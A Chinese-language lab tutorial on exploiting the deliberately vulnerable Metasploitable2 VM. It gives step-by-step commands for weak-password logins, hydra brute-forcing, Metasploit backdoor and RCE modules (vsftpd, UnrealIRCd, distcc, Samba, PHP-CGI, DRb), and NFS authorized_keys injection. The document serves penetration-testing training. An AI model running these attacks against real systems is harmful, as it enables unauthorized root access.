Metasploitable2 虛擬系統是一個特別制作的ubuntu操作系統,本身設計作為安全工具測試和演示常見漏洞攻擊。這個版本的虛擬系統兼容VMware,VirtualBox,和其他虛擬平台。默認只開啟一個網絡適配器並且開啟NAT和Host-only,本鏡像一定不要暴漏在一個易受攻擊的網絡中。
Metasploit攻擊框架:
Metasploit是一個開源的滲透測試框架軟件,也是一個逐步發展為成熟的漏洞研究與滲透代碼開發平台,此外也將成為支持整個滲透測試過程的安全技術集成開發與應用環境。
運行環境
VMware虛擬機,KaliLinux操作系統,metasploitable靶機(IP地址:192.168.127.135)
按照網上的教程安裝好了之后,在vm里面直接打開,啟動靶機,輸入ifconfig查看ip地址

在物理機上瀏覽器輸入這個ip地址192.168.127.135就可以看到靶機的界面,里面預裝了易攻擊的web應用。可以點擊首頁的超鏈接進行試驗,如果個人的web應用如果需要被訪問,需要在后面增加特定的文件路徑。http://<IP>/<應用文件夾>/ 而這個應用被安裝在系統 /var/www 這個文件夾里。

作為攻擊者的操作系統(linux,大多數時候使用BackTrack),我們需要在虛擬機中通過使用nmap來辨認開放的端口。接下來的命令能夠掃描目標系統-Metasploitable 2的所有TCP端口。
nmap -p0-65535 192.168.127.135
目標系統中幾乎每一個端口監聽的服務都給我們提供一個遠程接入點
弱密碼漏洞
原理:系統或者數據庫的登錄用戶,密碼簡單或者和用戶名相同,容易通過暴力破解手段來獲取密碼。
影響系統/軟件:
所有使用用戶名/密碼登錄的系統/軟件都有可能存在此問題。
在Metasploitable2中,系統口令、MySQL、PostgreSQL和VNC遠程登錄都存在弱密碼漏洞。
利用步驟:
系統弱密碼登錄:
在kali上執行命令行telnet 192.168.127.135 23
login和password都輸入msfadmin
登錄成功,進入系統

系統中至少還有以下弱密碼:

除了這些系統層面的賬戶
PostgreSQL 服務可以通過默認的用戶名postgres和密碼postgres登錄
在kali上執行psql –h 192.168.127.135 –U postgres
輸入密碼postgres
登錄成功,進入postgresql系統

MySQL 服務也開放,用戶名為root同時為空口令。
MySQL弱密碼登錄:
在kali上執行mysql –h 192.168.127.135 –u root
登錄成功,進入mysql系統

VNC服務提供一個遠程桌面接入服務通過使用默認的密碼password登錄
在kali圖形界面的終端中執行vncviewer 192.168.127.135
輸入密碼password
登錄成功,進入系統

Root用戶弱口令漏洞
SSH爆破
原理:靶機root用戶存在弱口令漏洞,在使用指南里並沒有指出。.
影響系統/軟件: Linux
利用步驟
1.輸入nmap –sV –O 192.168.127.135查看SSH端口是否開啟:
2.利用hydra工具,現將user.txt、pass.txt字典放到桌面上
hydra –L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.127.135 ssh
3.遠程連接測試一下
在kali上面 talnet 192.168.127.135
輸入爆破出來的登錄用戶名和密碼
就可以直接進去了



爆破FTP
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt ftp://192.168.127.135

端口滲透:
首先都要利用metasploit 然后在kali linux中進行滲透:
啟動msf 命令:msfconsole

1..Samba Sysmlink默認配置目錄遍歷漏洞
原理:Samba是一套實現SMB(servermessages block)協議,跨平台進行文件共享和打印共享服務的程序,samba的sambd默認配置在可寫文件共享時,存在目錄遍歷漏洞,遠程用戶可以通過smbclient端使用一個對稱命,創建一個包含..的目錄遍歷符的軟連接,可以進行目錄遍歷以及訪問任意文件。
利用步驟
- Search samba
- Use auxiliary/admin/smb/samba_symlink_traversal,選擇漏洞
- Show options 查看信息
- set rhost 192.168.127.135,設置要攻擊的機器IP
- set SMBSHARE tmp 設置SAM可寫文件
6.exploit,開始攻擊


2.UnrealIRCd后門漏洞
原理:在2009年11月到2010年6月間分布於某些鏡面站點的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的惡意代碼,遠程攻擊者能夠執行任意代碼。
影響系統/軟件:Unreal UnrealIRCd3.2.8.1
利用步驟
1.search irc
2.Use exploit/unix/irc/unreal_ircd_3281_backdoor,選擇漏洞
3.show options 查看信息
4.set rhost 192.168. 127.135,設置要攻擊的機器IP
5.exploit,開始攻擊
利用成功,執行uname –a驗證



3.Distcc后門漏洞
原理:Distcc用於大量代碼在網絡服務器上的分布式編譯,但是如果配置不嚴格,容易被濫用執行命令,該漏洞是XCode1.5版本及其他版本的distcc2.x版本配置對於服務器端口的訪問不限制。
影響系統/軟件: distcc 2.x
利用步驟
1.serach distcc
2.msf > useexploit/unix/misc/distcc_exec,選擇漏洞
3.set RHOST 192.168.127.135,設置要攻擊的機器IP
4.exploit,開始攻擊
利用成功,執行id查看權限,uname –a驗證服務器信息


4.Ingreslock后門漏洞
原理:Ingreslock后門程序監聽在1524端口,連接到1524端口就可以直接獲得root權限
參考鏈接如下:
利用步驟
在kali中執行命令行telnet 192.168.127.135 1524
獲得root權限
執行uname–a驗證

5.Vsftpd源碼包后門漏洞:
原理:在特定版本的vsftpd服務器程序中,被人惡意植入代碼,當用戶名以“:)”為結尾,服務器就會在6200端口監聽,並且能夠執行任意代碼。
影響系統/軟件:Vsftpd server v2.3.4
利用步驟
- search vsftpd
- use exploit/unix/ftp/vsftpd_234_backdoor,選擇漏洞
3.set rhosts 192.168.127.135,設置要攻擊的機器IP
4.exploit,開始攻擊
利用成功,執行uname–a驗證


6.PHP CGI參數注入執行漏洞
原理:CGI腳本沒有正確處理請求參數,導致源代碼泄露,允許遠程攻擊者在請求參數中插入執行命令。
影響系統/軟件
before 5.3.12 and 5.4.x before 5.4.2
利用步驟
1.msf > use exploit/multi/http/php_cgi_arg_injection,選擇漏洞
2.set RHOST 192.168.127.135,設置要攻擊的機器IP
3.exploit,開始攻擊
meterpreter > ls 獲得meterpreter,可執行ls列出目錄

7.Druby遠程代碼執行漏洞
原理:Druby配置不當,被濫用執行命令
影響系統/軟件
Ruby 1.8
利用步驟
nmap -p0-65535-sS -sV 192.168.127.135,NMAP掃描端口及端口應用
在kali中執行msfconsole,啟動metasploit
發現8787 druby端口
msf >search drb 搜索dbr相關漏洞
msf > useexploit/linux/misc/drb_remote_codeexec 使用漏洞
set URI druby:192.168.127.135:8787,設置要攻擊的機器的druby鏈接
exploit,開始攻擊
輸入id, uname -a確認
1.SambaMS-RPC Shell命令注入漏洞:
原理:Samba中負責在SAM數據庫更新用戶口令的代碼未經過濾便將用戶輸入傳輸給了/bin/sh。如果在調用smb.conf中定義的外部腳本時,通過對/bin/sh的MS-RPC調用提交了惡意輸入的話,就可能允許攻擊者以nobody用戶的權限執行任意命令。
影響系統/軟件
Xerox WorkCentre Pro
Xerox WorkCentre
VMWare ESX Server
Turbolinux Server/Personal/Multimedia/Home/Desktop/Appliance/FUJI
Trustix Secure Linux
SUSE Linux Enterprise
Sun Solaris
Slackware Linux
RedHat Enterprise
Mandriva Linux
MandrakeSoft Corporate Server
利用步驟
在kali中執行msfconsole,啟動metasploit
use exploit/multi/samba/usermap_script,選擇漏洞
set RHOST 192.168.127.135,設置要攻擊的機器IP
exploit,開始攻擊u
利用成功,執行uname–a驗證


2.Linux NFS共享目錄配置漏洞:
原理:NFS 服務配置漏洞,賦予了根目錄遠程可寫權限,導致/root/.ssh/authorized_keys可被修改,實現遠程ssh無密碼登陸。
影響系統/軟件
所有Linux系統的NFS服務
利用步驟
- 在kali上執行命令行rpcinfo -p 192.168.127.135,,查看nfs服務有無開啟:

2.用showmount -e 192.168.127.135,查看其設置的遠程共享目錄列表:

獲取一個系統的可寫入的文件系統權限是很簡單的。我們需要在攻擊者的系統上創建一個新的SSH秘鑰,掛載NFS接口,然后把我們的秘鑰添加到root使用者賬號的認證秘鑰文件里:
輸入ssh-keygen生成rsa公鑰:

依次輸入
Mkdir /tmp/t00l
mount –t nfs 192.168.127.135:/ /tmp/t00l,把192.168.127.135的根目錄掛載到/tmp/t00l/下。注:如果提示下圖中錯誤則需要/etc/init.d/rpcbind start來啟動mount

cat /root/.ssh/id_rsa.pub >> /tmp/t00l/root/.ssh/authorized_keys,把生成的公鑰追加到靶機的authorized_keys下;
sshroot@192.168.127.135,實現無密碼登陸。

參考鏈接:https://www.freebuf.com/articles/system/34571.html
